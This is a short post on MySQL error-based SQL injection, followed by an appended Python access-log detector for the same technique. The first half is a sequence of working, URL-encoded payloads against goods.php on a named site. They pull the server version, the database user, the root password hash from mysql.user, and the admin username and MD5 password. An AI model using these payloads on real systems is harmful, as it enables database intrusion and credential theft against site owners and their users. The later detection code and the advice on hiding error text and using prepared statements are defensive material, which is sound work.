Blind injection details

Posted on 2012-9-5 14:59:30

Determine the version number
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root hash
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Table names of the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

user_name column of the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

password column of the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Retrieve the admin passwd (md5)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
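Every payload in this post relies on the same MySQL quirk: a subquery that combines count(*), concat(...) and floor(rand()*2) under a GROUP BY makes the server raise a duplicate-key error whose message carries the concatenated value (here the version, user(), database(), a table name or a password hash). That fixed shape makes the technique easy to spot on the defending side. The following detector is an added example, not code from the original post: it walks web-server access-log lines, URL-decodes each query parameter and flags the parameters that carry the count(*)/concat/floor(rand())/GROUP BY signature together with the data sources the post reads (information_schema, mysql.user, @@version, char()-encoded strings). The log lines, client addresses and timestamps are constructed for the example; the request paths reuse the goods.php?id=...&wsid=... shape shown above.

```python
"""Detect the MySQL duplicate-key (error-based) injection pattern in access logs.

Added example, not part of the original post. SAMPLE_LOG is constructed;
the suspicious requests mirror the goods.php?id=352&wsid=... payloads above.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed combined-format log lines (addresses/timestamps are made up).
# Line 1 is benign, lines 2 and 3 carry the rand()/floor()/GROUP BY trick,
# line 4 is an unrelated benign search request.
SAMPLE_LOG = r'''
203.0.113.5 - - [05/Sep/2012:14:59:30 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 5120
203.0.113.5 - - [05/Sep/2012:14:59:41 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 1033
203.0.113.5 - - [05/Sep/2012:15:00:02 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 1033
198.51.100.9 - - [05/Sep/2012:15:01:10 +0800] "GET /search.php?q=cheap%20shoes HTTP/1.1" 200 8801
'''

# Minimal combined-log parser: client address, timestamp, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Rules run against the decoded, lowercased, whitespace-squeezed parameter value.
RULES = {
    # count(*) ... concat(... floor(rand(x)*2)) ... group by: the core
    # duplicate-key trick used in every payload of the post.
    "double_query_rand_groupby": re.compile(
        r"count\(\*\).*concat\(.*floor\(rand\([^)]*\)\s*\*\s*2\).*group\s+by"
    ),
    # Data sources the payloads read once the trick works.
    "info_schema_read": re.compile(r"information_schema\.(tables|columns|schemata)"),
    "mysql_user_read": re.compile(r"mysql\.user"),
    "server_var_read": re.compile(r"@@(version|version_compile_os)"),
    # char(114,111,111,116)-style string building used to dodge quote filters.
    "char_obfuscation": re.compile(r"char\(\s*\d+(\s*,\s*\d+)+\s*\)"),
}


def normalise(value):
    """Decode a second time (double-encoded clients), lowercase, squeeze spaces."""
    decoded = unquote_plus(unquote_plus(value))
    return re.sub(r"\s+", " ", decoded).lower()


def scan_target(target):
    """Return {param_name: sorted rule names} for parameters that trip any rule."""
    hits = {}
    # parse_qsl splits on the first '=' only, so '=' inside a payload is kept.
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = normalise(raw)
        matched = sorted(rule for rule, rx in RULES.items() if rx.search(value))
        if matched:
            hits[name] = matched
    return hits


def scan_log(text):
    """Return (client_ip, status, param, rules) for every flagged parameter."""
    alerts = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        for param, rules in scan_target(m.group("target")).items():
            alerts.append((m.group("ip"), int(m.group("status")), param, rules))
    return alerts


if __name__ == "__main__":
    for ip, status, param, rules in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} param={param} rules={','.join(rules)}")
```

The HTTP 500 on the flagged lines is the other half of the picture: the technique only yields data when the MySQL error text is echoed back to the client, so returning a generic error page and moving the query to a prepared statement removes the channel even if the pattern is not caught at the log layer.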